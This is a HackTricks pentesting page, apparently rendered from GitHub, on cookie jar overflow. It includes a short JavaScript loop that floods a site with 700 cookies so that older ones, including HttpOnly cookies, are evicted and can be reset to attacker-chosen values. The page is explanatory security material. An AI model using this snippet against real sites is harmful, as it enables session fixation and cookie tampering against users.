Skip to content

Latest commit

 

History

History
57 lines (36 loc) · 3.06 KB

cookie-jar-overflow.md

File metadata and controls

57 lines (36 loc) · 3.06 KB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

The browsers have a limit on the number of cookies that they can store for a page. Then, if for some reason you need to make a cookie disappear, you can overflow the cookie jar as the oldest ones will be deleted before:

// Set many cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Notice, that third party cookies pointing to a different domain won't be overwritten.

{% hint style="danger" %} This attack can also be used to overwrite HttpOnly cookies as you can delete it and then reset it with the value you want.

Check this in this post with a lab. {% endhint %}

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}